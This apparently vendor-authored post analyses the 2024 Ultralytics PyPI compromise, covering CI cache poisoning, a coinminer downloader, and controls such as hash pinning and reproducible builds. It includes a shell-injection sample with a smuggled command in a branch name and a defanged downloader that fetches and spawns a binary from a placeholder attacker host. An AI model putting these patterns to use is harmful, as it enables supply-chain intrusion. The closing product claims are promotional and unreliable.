On December 4, 2024, two Ultralytics releases (8.3.41 and 8.3.42) shipped a cryptocurrency miner to everyone who ran pip install ultralytics in the window before maintainers yanked them. The package pulls roughly 60 million monthly downloads across ML pipelines, CI runners, and research notebooks, so the blast radius was large. The root cause was not stolen credentials or a typosquat. It was a poisoned GitHub Actions cache that mutated the published artifact after tests passed but before the PyPI upload.
This post walks through the mechanics, what defenders saw on the wire, and which controls would have actually stopped it.
How did the attackers get code into a signed release?
The attackers did not bypass trusted publishing. They poisoned the build environment that produced the artifact uploaded under trusted publishing.
Ultralytics used a GitHub Actions workflow that built wheels inside a job and relied on the actions/cache mechanism to speed up Python dependency installs. An earlier pull request from a fork triggered a workflow with a branch name containing a shell-injection payload. That payload executed in the context of a privileged workflow step and wrote attacker-controlled files into the shared Actions cache, which was subsequently restored in the release build job. By the time the release workflow ran, the restored cache contained altered build tooling. The wheel was built with attacker-controlled code, signed, and pushed to PyPI through the legitimate OIDC-based trusted publishing flow.
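The bug class is ordinary shell injection, just relocated into CI. A toy sketch of the same class in Python, with a made-up branch name standing in for the attacker-controlled ref (this illustrates the pattern, not the actual Ultralytics workflow):

```python
# Toy illustration of the injection class behind the cache poisoning --
# not the actual Ultralytics workflow. The "branch name" is untrusted
# input spliced into a shell command.
import subprocess

branch = 'fix/typo"; touch /tmp/poisoned-cache; echo "'  # attacker-chosen

# Vulnerable pattern: untrusted input interpolated into the command
# string -- the same class as expanding ${{ github.head_ref }} inside a
# privileged `run:` step.
subprocess.run(f'git checkout "{branch}"', shell=True)

# Safe pattern: pass untrusted input as a single argv element so no
# shell ever parses it.
subprocess.run(["git", "checkout", branch])
```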
The consequence matters: every downstream verification control (PyPI provenance, Sigstore attestation, signed tag, GitHub release notes) reported "valid" because the malicious code was baked in before those signatures were produced. Provenance tells you who built it. It does not tell you whether the build environment was clean.
What did the malware actually do on install?
The injected payload was a Monero coinminer, staged through a downloader and executed at import time.
Static analysis of 8.3.41 showed a modified module adjacent to the package's __init__.py that executed a shell command on the first call to common Ultralytics functions. The command fetched a second-stage binary from an attacker-controlled host and spawned it as a background process. On GPU-equipped hosts the miner targeted CUDA devices; on CPU-only hosts it fell back to a smaller CPU miner. No data-exfiltration component was observed in public reverse-engineering writeups, but the execution primitive was a generic downloader, meaning a follow-up push with different second-stage logic would have been trivial.
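Based on the public writeups, the primitive looked roughly like the defanged sketch below. The host, file name, and function name are placeholders, not the actual payload; the point is the shape: fetch at first use, detach, stay silent.

```python
# Defanged sketch of the downloader primitive -- NOT the real payload.
# The .invalid host never resolves; names are placeholders.
import os
import stat
import subprocess
import tempfile
import urllib.request

def _fetch_and_spawn():
    url = "https://attacker.invalid/second-stage"      # placeholder host
    dest = os.path.join(tempfile.gettempdir(), ".cache-helper")
    urllib.request.urlretrieve(url, dest)              # stage the binary
    os.chmod(dest, os.stat(dest).st_mode | stat.S_IEXEC)
    # Detach so the import returns normally and the caller sees no error.
    subprocess.Popen([dest], stdout=subprocess.DEVNULL,
                     stderr=subprocess.DEVNULL, start_new_session=True)
```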
The important detail for defenders: static SBOM diffing against 8.3.40 would have flagged the new behavior only if the diff included modified entrypoints and install-time scripts. A dependency list comparison alone missed it.
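A file-level diff of consecutive wheels is cheap and would have surfaced the change regardless of what the SBOM recorded. A minimal sketch, assuming both wheels are on disk (filenames illustrative):

```python
# Diff two wheel archives file-by-file, so a modified entrypoint shows
# up even when the dependency list is unchanged.
import hashlib
import zipfile

def wheel_digests(path):
    """Map each file inside the wheel to its sha256 digest."""
    with zipfile.ZipFile(path) as zf:
        return {name: hashlib.sha256(zf.read(name)).hexdigest()
                for name in zf.namelist()}

old = wheel_digests("ultralytics-8.3.40-py3-none-any.whl")
new = wheel_digests("ultralytics-8.3.41-py3-none-any.whl")

for name in sorted(set(old) | set(new)):
    if old.get(name) != new.get(name):
        status = ("CHANGED" if name in old and name in new
                  else "ADDED" if name in new else "REMOVED")
        print(status, name)
```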
Why didn't detection fire faster?
Detection lagged because the artifact looked authentic on every conventional integrity check.
PyPI stored valid provenance. The Git tag matched the release. The hash PyPI served matched what users downloaded. The first credible reports came from users who noticed elevated CPU or GPU usage after upgrading and started reading the package contents. About six hours passed between the first upload and the first public report, and another several hours before Ultralytics yanked the release and cut a clean 8.3.43. For pipelines with unpinned versions or >= constraints, that window was enough to propagate the miner into thousands of container images.
The gap here is behavioral. Integrity checks verify that the artifact is what the publisher intended to ship. They cannot catch cases where the publisher's build system was intentionally corrupted.
Which teams were most exposed?
Teams with three patterns took the worst hit: unpinned dependencies, rebuild-on-push Docker images, and shared CI caches.
Unpinned installs grabbed the poisoned version within minutes of upload. Docker base images that ran pip install ultralytics during build produced poisoned layers that then flowed into ECR, GHCR, and internal registries. Shared CI caches meant the miner kept executing in subsequent unrelated builds even after the upstream package was yanked, because cached wheels persisted. A meaningful number of teams were still discovering poisoned layers days later when auditing running containers for unexpected outbound connections.
The cleanest remediation for affected teams was: identify all image digests built between December 4 and December 5 that included Ultralytics, rebuild from 8.3.43 or later, invalidate CI caches, and audit any long-running training jobs started in that window.
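For the first triage pass, a version check inside each suspect container or virtualenv separates affected from unaffected quickly. A minimal sketch:

```python
# Quick triage: flag environments that installed a poisoned release.
# Run inside each container or venv under audit.
from importlib.metadata import PackageNotFoundError, version

POISONED = {"8.3.41", "8.3.42"}

try:
    installed = version("ultralytics")
except PackageNotFoundError:
    installed = None

if installed in POISONED:
    print(f"ultralytics {installed} is poisoned: rebuild from 8.3.43+ "
          "and invalidate CI caches")
elif installed:
    print(f"ultralytics {installed} is outside the poisoned range")
else:
    print("ultralytics not installed here")
```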
What controls would have prevented this?
Four controls, in order of how much they would have reduced damage.
First, pinning transitive and direct dependencies with lockfiles and hash verification. pip install --require-hashes with a resolved requirements.txt would have refused the poisoned wheel because its hash did not match the pre-incident lockfile.
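Concretely, a lockfile produced with pip-compile --generate-hashes pins every artifact to a sha256 digest, and pip refuses anything that does not match. A minimal sketch of the same check (the pinned digest is a placeholder, not the real 8.3.40 hash):

```python
# Sketch of the check pip performs under --require-hashes: the
# artifact's digest must match the lockfile entry before install.
import hashlib
from pathlib import Path

PINNED = {
    # Placeholder digest standing in for the pre-incident lockfile entry.
    "ultralytics-8.3.40-py3-none-any.whl": "sha256:" + "00" * 32,
}

def verify(wheel_path):
    wheel = Path(wheel_path)
    digest = "sha256:" + hashlib.sha256(wheel.read_bytes()).hexdigest()
    if PINNED.get(wheel.name) != digest:
        # An unpinned version (like the poisoned 8.3.41) or a tampered
        # wheel both fail here.
        raise SystemExit(f"{wheel.name}: hash mismatch, refusing to install")
```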
Second, isolating untrusted fork workflows from release workflows: they should never share cache or secret scope. The GitHub Actions design allows this separation, but it requires explicit pull_request_target discipline, minimal-scope tokens, and cache keys scoped to trusted refs only.
Third, reproducible builds with multi-party attestation. If the build ran in two independent environments and both produced matching artifacts before PyPI upload, the single-environment poisoning would have failed verification.
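A sketch of such a gate, assuming two independent builders have written their outputs to separate directories (paths illustrative):

```python
# Cross-environment reproducibility gate: release proceeds only if two
# independently built wheels match bit-for-bit.
import hashlib
import sys
from pathlib import Path

def digest(path):
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()

a = digest("builder-a/dist/ultralytics-8.3.41-py3-none-any.whl")
b = digest("builder-b/dist/ultralytics-8.3.41-py3-none-any.whl")

if a != b:
    # A single poisoned build environment produces a mismatch here,
    # before anything reaches the registry.
    sys.exit(f"non-reproducible build: {a} != {b} -- blocking upload")
print(f"reproducible: {a}")
```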
Fourth, install-time behavioral sandboxing. Tools that observe what a package does during pip install and first import, and compare against a historical behavioral baseline, would have flagged the unexpected outbound DNS and new child process. SBOM alone does not capture this; runtime signals do.
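A rough sketch of that kind of probe, assuming psutil is available. A production tool would trace syscalls and DNS properly, but even this level of observation catches a spawned miner:

```python
# Import the candidate package in a child process and record what it
# spawns and which remote addresses it contacts, for comparison with
# the previous version's baseline. Package name is illustrative.
import subprocess
import sys
import time

import psutil

child = subprocess.Popen([sys.executable, "-c", "import ultralytics"])
spawned, contacted = set(), set()

while child.poll() is None:
    try:
        tree = [psutil.Process(child.pid)]
        tree += tree[0].children(recursive=True)
        for proc in tree:
            spawned.add(proc.name())  # includes the interpreter itself
            contacted |= {c.raddr for c in proc.connections() if c.raddr}
    except psutil.NoSuchProcess:
        pass  # a process exited between enumeration and inspection
    time.sleep(0.2)

print("spawned:", spawned or "nothing")
print("contacted:", contacted or "nothing")
# Any new process name or remote address relative to the 8.3.40 baseline
# is exactly the delta that would have flagged 8.3.41 pre-disclosure.
```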
Most teams had none of these. A few had hash pinning, and those teams were quietly unaffected.
What does this tell us about trusted publishing?
Trusted publishing protects the link between publisher and registry. It does not protect the build environment that produces the artifact, and that is where the attack happened.
Sigstore, PyPI's trusted publishing flow, and GitHub OIDC attestations are valuable and should be adopted everywhere they are available. But they answer a narrower question than most teams assume. The attestation says: "this artifact was built by this workflow on this commit of this repository." It does not say: "this artifact was built from an uncompromised environment using unmodified tooling." The Ultralytics attackers did not fake the attestation; they poisoned the inputs to an otherwise-legitimate attestation-producing flow.
The correct response is not to abandon trusted publishing. It is to combine it with reproducible builds and build-environment isolation. If you can build the same artifact twice, in independent environments, and get bit-for-bit matching outputs, a single-environment compromise fails reproducibility checks before it reaches the registry. Reproducible builds are operationally harder than they sound (timestamps, path differences, non-determinism in compilers), but the Python ecosystem has made meaningful progress here, and the payoff is direct: the Ultralytics attack would have failed cross-environment comparison. For internal build pipelines producing critical artifacts, running two parallel builds in differently-configured environments and diffing the output is a concrete, achievable control.
How Safeguard.sh Helps
Safeguard.sh's reachability analysis would have correlated the new downloader primitive in 8.3.41 with actual call paths in your codebase, applying the 60-80% noise reduction typical of reachability-filtered SCA and escalating this specific regression to the top of the queue. Griffin AI flags behavioral deltas between package versions (new network egress, new process spawns, new filesystem writes at import time) rather than relying solely on signature matches, so the Ultralytics payload would have surfaced independently of public disclosure. Our SBOM pipeline tracks artifacts up to 100 levels of dependency depth and continuously re-evaluates them against upstream events, and the TPRM workflow would have pinned Ultralytics under ML supplier controls, where any version bump triggers a review gate. For teams running containerized training workloads, container self-healing would have automatically rolled back the poisoned image layer the moment outbound miner traffic was observed.